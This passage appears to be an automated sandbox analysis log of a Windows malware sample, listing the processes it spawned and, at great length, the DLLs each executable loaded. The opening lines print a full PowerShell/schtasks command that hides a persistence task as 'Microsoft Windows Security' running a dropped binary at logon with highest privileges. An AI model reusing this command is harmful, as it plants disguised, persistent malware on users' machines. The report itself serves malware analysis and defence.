Source: C:\Windows\System32\conhost.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#ydcfdz#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Microsoft Windows Security' /tr '''C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Microsoft Windows Security' -RunLevel 'Highest' -Force; }
Source: C:\Windows\System32\conhost.exe	Process created: unknown unknown
Source: C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#evrkcgqew#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Microsoft Windows Security' /tr '''C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Microsoft Windows Security' -RunLevel 'Highest' -Force; }

Source: C:\Users\user\Desktop\f5TWdT5EAc.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\f5TWdT5EAc.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\f5TWdT5EAc.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\f5TWdT5EAc.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\f5TWdT5EAc.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\f5TWdT5EAc.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\f5TWdT5EAc.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\f5TWdT5EAc.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\f5TWdT5EAc.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\f5TWdT5EAc.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\f5TWdT5EAc.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\f5TWdT5EAc.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\f5TWdT5EAc.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\f5TWdT5EAc.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\f5TWdT5EAc.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\f5TWdT5EAc.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\f5TWdT5EAc.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\f5TWdT5EAc.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\f5TWdT5EAc.exe	Section loaded: shfolder.dll	Jump to behavior
Source: C:\Users\user\Desktop\f5TWdT5EAc.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\f5TWdT5EAc.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\f5TWdT5EAc.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\Desktop\f5TWdT5EAc.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\Desktop\f5TWdT5EAc.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\f5TWdT5EAc.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\f5TWdT5EAc.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\f5TWdT5EAc.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\f5TWdT5EAc.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\34D7.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\34D7.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\34D7.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\34D7.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\34D7.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\34D7.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\34D7.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\34D7.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\34D7.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\34D7.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\34D7.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\34D7.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\34D7.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\34D7.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\34D7.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\34D7.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\34D7.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\34D7.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\34D7.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\896429707.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\896429707.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\896429707.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\896429707.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\896429707.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\896429707.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\896429707.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\sysnldcvmr.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\sysnldcvmr.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\sysnldcvmr.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\sysnldcvmr.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\sysnldcvmr.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\sysnldcvmr.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\sysnldcvmr.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\sysnldcvmr.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\sysnldcvmr.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\sysnldcvmr.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\sysnldcvmr.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\sysnldcvmr.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\sysnldcvmr.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\sysnldcvmr.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\sysnldcvmr.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\sysnldcvmr.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\sysnldcvmr.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\sysnldcvmr.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Windows\sysnldcvmr.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Windows\sysnldcvmr.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Windows\sysnldcvmr.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Windows\sysnldcvmr.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\sysnldcvmr.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Windows\sysnldcvmr.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\sysnldcvmr.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\sysnldcvmr.exe	Section loaded: firewallapi.dll	Jump to behavior
Source: C:\Windows\sysnldcvmr.exe	Section loaded: fwbase.dll	Jump to behavior
Source: C:\Windows\sysnldcvmr.exe	Section loaded: fwpolicyiomgr.dll	Jump to behavior
Source: C:\Windows\sysnldcvmr.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\sysnldcvmr.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\sysnldcvmr.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\sysnldcvmr.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\sysnldcvmr.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\sysnldcvmr.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\sysnldcvmr.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\sysnldcvmr.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1171111125.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1171111125.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1171111125.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1171111125.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1171111125.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1171111125.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1171111125.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1171111125.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1171111125.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1171111125.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1171111125.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1171111125.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1171111125.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1171111125.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1171111125.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1171111125.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1171111125.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1171111125.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1171111125.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2779421088.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2779421088.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\78476062.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\78476062.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\78476062.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\78476062.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\78476062.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\78476062.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\78476062.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\78476062.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\78476062.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\78476062.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\78476062.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\78476062.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\78476062.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\78476062.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\78476062.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\78476062.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\640832494.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\640832494.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wersvc.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: windowsperformancerecordercontrol.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: weretw.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: xmllite.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wer.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: faultrep.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: dbghelp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: dbgcore.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wer.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wlidsvc.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ncrypt.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: clipc.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: dpapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ntasn1.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msxml6.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: winhttp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: netprofm.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wtsapi32.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: winsta.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: gamestreamingext.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msauserext.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: tbs.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: npmproxy.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: webio.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: mswsock.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: winnsi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: dnsapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: rasadhlp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: schannel.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: mskeyprotect.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptnet.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ncryptsslp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptngc.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: devobj.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ncryptprov.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: elscore.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: elstrans.dll
Source: C:\Users\user\AppData\Local\Temp\1657630034.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1657630034.exe	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1657630034.exe	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\1657630034.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1657630034.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1657630034.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1657630034.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1657630034.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1657630034.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1657630034.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1657630034.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1657630034.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1657630034.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1657630034.exe	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\1657630034.exe	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\1657630034.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kdscli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Local\Temp\2910625892.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\2910625892.exe	Section loaded: wininet.dll
